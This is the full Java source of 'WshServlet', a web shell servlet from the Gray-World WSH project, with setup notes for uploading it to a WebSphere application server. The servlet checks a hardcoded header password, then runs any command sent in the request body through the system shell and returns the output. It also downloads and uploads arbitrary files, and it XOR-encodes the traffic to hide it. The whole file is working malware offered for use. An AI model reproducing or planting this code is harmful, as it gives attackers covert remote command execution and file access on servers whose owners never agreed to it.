wshservlet.java

Wsh, "Web Shell" - 远程控制UNIX/WIN SHELL

/*******************************************************************************
** WshServlet.java - WebShell Server Java servlet version - v1.0              ** 
** Copyright (C) 2004 Simon Castro - <scastro [at] entreelibre.com>           **
**                                                                            **
**   This file is part of WSH v2.2.0 - WebShell v2.2.0 - (C) Alex Dyatlov and **
** Simon Castro - and is part of the Gray-World Team projects.  Visit  us  on **
** http://www.gray-world.net or send a mail to <team [at] gray-world.net>.    **
**                                                                            **
**   WshServlet.java is free software; you can redistribute it and/or  modify **
** it under the terms of the GNU General Public License as published  by  the **
** Free Software Foundation; either version 2 of the  License,  or  (at  your **
** option) any later version.                                                 **
**                                                                            **
**   WshServlet.java is distributed in the hope that it will be  useful,  but **
** WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY **
** or FITNESS FOR A PARTICULAR PURPOSE. See the GNU  General  Public  License **
** for more details.                                                          **
**                                                                            **
**   You should have received a copy of the GNU General Public License  along **
** with this file; if not, write to the Free Software  Foundation,  Inc.,  59 **
** Temple Place, Suite 330, Boston, MA 02111-1307 USA                         **
*******************************************************************************/

/*******************************************************************************
**                     COMPILATION AND SETUP INFOS                            **
**                                                                            **
**   Have a look and change the CONFIGURATION part, then  build  the  servlet **
** using 'javac -classpath path_to_lib/j2ee.jar WshServlet.java'  and  upload **
** it under a servlet executable location such as  ...installedApps/nodename/ **
** DefaultApplication.ear/DefaultWebApplication.war/  for  an  IBM  Websphere **
** Application Server. You'll then be able to reach  the  servlet  using  the **
** "/servlet/WshServlet/" URI.                                                **
**   Special thanks to DDesch for his icq online support ;)                   **
*******************************************************************************/

import java.io.*;
import java.util.*;
import javax.servlet.*;
import javax.servlet.http.*;

public final class WshServlet extends HttpServlet 
{
    /******************
    ** CONFIGURATION **
    ******************/

    // Password Key
    private final String Conf_XPASS = "KEY";

    // Xor value
    private final char Conf_XORED = 1; // 0: disabled - 1: enabled
    private final char Conf_XORVAL = 85;

    // Shell execution parameters for *Nix
    private final String Conf_SHELL="/bin/sh";
    private final String Conf_SHELL_ARG="-c";

    // Shell execution parameters for Win32
    // private final String Conf_SHELL="c:\\winnt\\system32\\cmd.exe";
    // private final String Conf_SHELL_ARG="/C";

    /**********************
    ** END CONFIGURATION **
    **********************/

    private final String Param_XKEY = "HTTP_X_KEY";
    private final String Param_FILEGET = "HTTP_X_FILEGET";
    private final String Param_FILEPUT = "HTTP_X_FILEPUT";

    /*********
    ** MAIN **
    *********/

    public final void doPost (HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException
    {
	String fileget = null, fileput = null;
	ServletOutputStream out;

	if (check_XKEY(req) != 0) // First check password in X-Key header
	    return;
	if (req.getContentType() == null) // Exit if no content-type header
	    return;

	res.setContentType("text/html"); // Tell we're going to process the request

	try
	    {
		out = res.getOutputStream();
	
		if ((fileget = req.getHeader(Param_FILEGET)) == null &&
		    (fileput = req.getHeader(Param_FILEPUT)) == null) {
		    go_for_exec(req,out);
		} else {
		    if (fileget != null) {
			go_for_download(fileget,out);
		    } else {
			go_for_upload(req,fileput,out);
		    }
		}
	    }
	
	catch (IOException e)
	    {
		return;
	    }

	finally
	    {
		// don't do nothing just like the other versions...
		return;
	    }
    }

    /**************
    ** FUNCTIONS **
    **************/

    /* 
    ** Check the HTTP_X_KEY field 
    */

    private final int check_XKEY (HttpServletRequest req)
    {
	String KEY;
	
	if ((KEY = req.getHeader(Param_XKEY)) != null) {
	    if (KEY.compareTo(Conf_XPASS) == 0) {
		return (0);
	    }
	}
	return (-1);
    }

    /* 
    ** Xor string or char 
    */

    private final char xor_that_char (char chr)
    {
	if (Conf_XORED == 1) {
	    return ((char) (chr ^ Conf_XORVAL));
	}
	return (chr);
    }
    
    private final String xor_that_string (String str)
    {
	if (Conf_XORED == 1) {

	    char[] to_xor = str.toCharArray();
	    for (int i=0; i < to_xor.length; i++) {
		to_xor[i] = (char) (to_xor[i] ^ Conf_XORVAL);

	    }

	    try // The caller checks for null
		{
		    str = new String(to_xor);
		}

	    catch (NullPointerException n)
		{
		    return (null);
		}
	    
	}
	return (str);
    }

    /* 
    ** Call the shell and execute command 
    */

    private final int go_for_exec(HttpServletRequest req, ServletOutputStream out) throws IOException
    {
	String tmp = null;
	Process p = null;

	try
	    {
		BufferedReader http_body = new BufferedReader(req.getReader());
	
		// don't care about CRLF just like other langages versions...
		tmp = http_body.readLine();

		if (http_body != null) http_body.close();
		if (tmp == null) return (-1); // No command ?

		// Check if XorEncoded flag is on and do the job
		if ((tmp = xor_that_string(tmp)) == null) // maisquesepassetil?
		    return (-1);
	    }

	catch (IOException e)
	    {
		return (-1);
	    }

	BufferedReader exec_cmd = null;

	try
	    {
		Runtime r = Runtime.getRuntime();
		String cmd[] = { Conf_SHELL , Conf_SHELL_ARG , tmp};
		p = r.exec(cmd,null);

		exec_cmd = new BufferedReader(new InputStreamReader(p.getInputStream()));
		tmp=null;
		while ((tmp = exec_cmd.readLine()) != null) {
		    
		    tmp = tmp+'\n';
		    // Check if XorEncoded flag is on and do the job
		    if ((tmp = xor_that_string(tmp)) == null) { // maisquesepassetil?
			if (exec_cmd != null) exec_cmd.close();
			return (-1); 
		    }
		    
		    out.print(tmp);
		}
	    }

	catch (Exception e)
	    {
		if (exec_cmd != null) exec_cmd.close();
		return (-1);
	    }

	finally
	    {
		if (exec_cmd != null) exec_cmd.close();
		return (0);
	    }
    }

    /* 
    ** Download a file 
    */

    private final int go_for_download(String Fileget, ServletOutputStream out) throws IOException
    {
	int ch;
	InputStream istream = null;
	
	try 
	    {
		istream = new BufferedInputStream(new FileInputStream(Fileget));
		while ((ch = istream.read()) != -1) {
		    ch = xor_that_char((char) ch);
		    out.print((char)ch);
		}
	    }

	catch (Exception e)
	    {
		if (istream != null) istream.close();
		return (-1);
	    }
	
	finally 
	    {
		if (istream != null) istream.close();
		return (0);
	    }

    }

    /*
    ** Upload a file
    */

    private final int go_for_upload(HttpServletRequest req, String Fileput, ServletOutputStream out) throws IOException
    {
	int ch;
	InputStream istream = null;
	OutputStream ostream = null;

	// Is there any data supplied in the body ?
	if (req.getContentLength() < 1) return (-1);

	try
	    {
		ostream = new BufferedOutputStream(new FileOutputStream(Fileput));
		istream = new BufferedInputStream(req.getInputStream());

		while ((ch = istream.read()) != -1) {
		    ch = xor_that_char((char) ch);
		    ostream.write(ch);
		}

	    }

	catch (Exception e)
	    {
		if (istream != null) istream.close();
		if (ostream != null) {
		    ostream.flush();
		    ostream.close();
		}
		return (-1);
	    }

	finally
	    {
		if (istream != null) istream.close();
		if (ostream != null) {
		    ostream.flush();
		    ostream.close();
		}
		return (0);
	    }
    }
}